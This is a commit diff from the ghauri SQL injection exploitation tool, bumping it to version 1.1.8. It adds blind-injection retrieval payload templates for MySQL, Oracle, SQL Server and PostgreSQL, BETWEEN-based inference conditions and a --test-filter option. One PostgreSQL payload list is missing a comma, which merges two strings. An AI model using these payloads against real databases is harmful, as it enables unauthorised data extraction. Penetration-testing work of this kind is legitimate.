Projects STRLCPY ghauri Commits 502f2a36
  • updated code quality, added further retrieval payloads, updated code of confirming the characters when --fetch-using=between is used, added new switch for performing tests based on title(s). bumped version 1.1.8

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  • r0oth3x49 committed 1 year ago
    1 parent 95d53fb4
  • ■ ■ ■ ■
    1  -[![GitHub release](](
     1 +[![GitHub release](](
    2 2  [![GitHub stars](](
    3 3  [![GitHub forks](](
    4 4  [![GitHub issues](](
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    24 24   
    25 25  """
    26 26   
    27  -__version__ = "1.1.7"
     27 +__version__ = "1.1.8"
    28 28  __author__ = "Nasir Khan (r0ot h3x49)"
    29 29  __license__ = "MIT"
    30 30  __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"
    skipped 2 lines
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    skipped 97 lines
    98 98   self.rto_warning = False
    99 99   self.fetch_using = None
    100 100   self.rtom_warning = False
     101 + self.test_filter = None
    101 102   
    102 103   @property
    103 104   def session_filepath(self):
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    skipped 34 lines
    35 35   "MySQL": [
    36 36   "ORD(MID(LENGTH({query}),{position},1))={char}",
    37 37   "ORD(MID(IFNULL(LENGTH({query}),0),{position},1))={char}",
     38 + "ORD(MID(IFNULL(CAST(LENGTH({query}) AS NCHAR),0),{position},1))={char}",
    38 39   ],
    39 40   "Oracle": [
    40 41   "ASCII(SUBSTRC(LENGTH({query}),{position},1))={char}",
    41 42   "ASCII(SUBSTRC(NVL(LENGTH({query}),0),{position},1))={char}",
     43 + "ASCII(SUBSTRC(NVL(CAST(LENGTH({query}) AS VARCHAR(4000)),0),{position},1))={char}",
    42 44   ],
    43 45   "Microsoft SQL Server": [
    44 46   "UNICODE(SUBSTRING(LTRIM(STR(LEN({query}))),{position},1))={char}",
    45 47   "UNICODE(SUBSTRING(LEN({query}),{position},1))={char}",
     48 + "UNICODE(SUBSTRING(ISNULL(CAST(LEN({query}) AS NVARCHAR(4000)),0),{position},1))={char}",
    46 49   ],
    47 50   "PostgreSQL": [
    48  - "ASCII(SUBSTRING(LENGTH({query}::text)::text FROM {position} FOR 1))={char}"
     51 + "ASCII(SUBSTRING(LENGTH({query}::text)::text FROM {position} FOR 1))={char}",
     52 + "ASCII(SUBSTRING(COALESCE(LENGTH({query})::text,CHR(48))::text FROM {position} FOR 1))={char}"
     53 + "ASCII(SUBSTRING(COALESCE(CAST(LENGTH({query})::text AS VARCHAR(10000))::text,CHR(32))::text FROM {position} FOR 1))={char}",
    49 54   ],
    50 55  }
    51 56   
    53 58   "MySQL": {
    54  - "ASCII": "ORD(MID({query},{position},1))={char}",
    55  - "ASC": "ORD(MID(IFNULL({query},0x20),{position},1))={char}",
     59 + "no-cast": "ORD(MID({query},{position},1))={char}",
     60 + "isnull": "ORD(MID(IFNULL({query},0x20),{position},1))={char}",
     61 + "cast": "ORD(MID(IFNULL(CAST({query} AS NCHAR),0x20),{position},1))={char}",
    56 62   # "CHAR": "MID({query},{position},1)=CHAR({char})",
    57 63   },
    58 64   "Oracle": {
    59  - "ASCII": "ASCII(SUBSTRC({query},{position},1))={char}",
    60  - "ASC": "ASCII(SUBSTRC(NVL({query},CHR(32)),{position},1))={char}",
     65 + "no-cast": "ASCII(SUBSTRC({query},{position},1))={char}",
     66 + "isnull": "ASCII(SUBSTRC(NVL({query},CHR(32)),{position},1))={char}",
     67 + "cast": "ASCII(SUBSTRC(NVL(CAST({query} AS NVARCHAR(4000)),CHR(32)),{position},1))={char}",
    61 68   # "CHAR": "SUBSTR({query},{position},1)=CHR({char})",
    62 69   },
    63 70   "Microsoft SQL Server": {
    64  - "ASCII": "UNICODE(SUBSTRING({query},{position},1))={char}",
    65  - "ASC": "UNICODE(SUBSTRING(ISNULL({query},' '),{position},1))={char}",
     71 + "no-cast": "UNICODE(SUBSTRING({query},{position},1))={char}",
     72 + "isnull": "UNICODE(SUBSTRING(ISNULL({query},' '),{position},1))={char}",
     73 + "cast": "UNICODE(SUBSTRING(ISNULL(CAST({query} AS NVARCHAR(4000)),' '),{position},1))={char}",
    66 74   # "CHAR": "SUBSTRING({query},{position},1)=CHAR({char})",
    67 75   },
    68 76   "PostgreSQL": {
    69  - "ASCII": "ASCII(SUBSTRING({query}::text FROM {position} FOR 1))={char}",
    70  - "ASC": "ASCII(SUBSTRING((COALESCE({query}::text,CHR(32)))::text FROM {position} FOR 1))={char}",
     77 + "no-cast": "ASCII(SUBSTRING({query}::text FROM {position} FOR 1))={char}",
     78 + "isnull": "ASCII(SUBSTRING((COALESCE({query}::text,CHR(32)))::text FROM {position} FOR 1))={char}",
     79 + "cast": "ASCII(SUBSTRING((COALESCE(CAST({query} AS VARCHAR(10000))::text,CHR(32)))::text FROM {position} FOR 1))={char}",
    71 80   # "CHAR": "SUBSTRING({query}::text FROM {position} FOR 1)=CHR({char})",
    72 81   },
    73 82  }
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    1895 1895   vector=vector,
    1896 1896   )
    1897 1897   _temp.append(_r)
     1898 + # experimental..
     1899 + if conf.test_filter:
     1900 + _filtered_tests = []
     1901 + for t in _temp:
     1902 + title = t.title
     1903 + mobj ="(?is)(?:%s)" % (re.escape(conf.test_filter)), title)
     1904 + if mobj:
     1905 + _filtered_tests.append(t)
     1906 + if _filtered_tests:
     1907 + _temp = _filtered_tests
    1898 1908   return _temp
    1899 1909   
    1900 1910   
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    487 487   char=ord(identified_character),
    488 488   )
    489 489   if vector_type == "time_vector":
    490  - condition = replace_with(
    491  - string=condition, character="=", replace_with="!="
    492  - )
     490 + if conf.fetch_using.lower() == "between":
     491 + condition = replace_with(
     492 + string=condition,
     493 + character="=",
     494 + replace_with=" NOT BETWEEN 0 AND ",
     495 + )
     496 + else:
     497 + condition = replace_with(
     498 + string=condition, character="=", replace_with="!="
     499 + )
     500 + if vector_type == "boolean_vector":
     501 + if conf.fetch_using.lower() == "between":
     502 + condition = replace_with(
     503 + string=condition,
     504 + character="=",
     505 + replace_with=" BETWEEN 0 AND ",
     506 + )
    493 507   expression = vector.replace("[INFERENCE]", f"{condition}").replace(
    494 508   "[SLEEPTIME]", f"{timesec}"
    495 509   )
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    skipped 87 lines
    88 88   confirm_payloads=False,
    89 89   safe_chars=None,
    90 90   fetch_using=None,
     91 + test_filter=None,
    91 92  ):
    92 93   verbose_levels = {
    93 94   1: logging.INFO,
    skipped 8 lines
    102 103   conf.safe_chars = safe_chars
    103 104   conf.timesec = timesec
    104 105   conf.fetch_using = fetch_using
     106 + conf.test_filter = test_filter
    105 107   logger.start("starting")
    106 108   if not force_ssl:
    107 109   ssl._create_default_https_context = ssl._create_unverified_context
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    skipped 63 lines
    64 64   action="store_true",
    65 65   help="Flush session files for current target",
    66 66   )
     67 + general.add_argument(
     68 + "--test-filter",
     69 + dest="test_filter",
     70 + type=str,
     71 + help="Select test payloads by titles (experimental)",
     72 + metavar="",
     73 + )
    67 74   
    68 75   target = parser.add_argument_group(
    69 76   "Target",
    skipped 385 lines
    455 462   confirm_payloads=args.confirm_payloads,
    456 463   safe_chars=args.safe_chars,
    457 464   fetch_using=args.fetch_using,
     465 + test_filter=args.test_filter,
    458 466   )
    459 467   if resp.is_injected:
    460 468   target = ghauri.Ghauri(
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    5 5   
    6 6  setup(
    7 7   name="ghauri",
    8  - version="1.1.7",
     8 + version="1.1.8",
    9 9   description="An advanced SQL injection detection & exploitation tool.",
    10 10   classifiers=["Programming Language :: Python3"],
    11 11   author="Nasir Khan",
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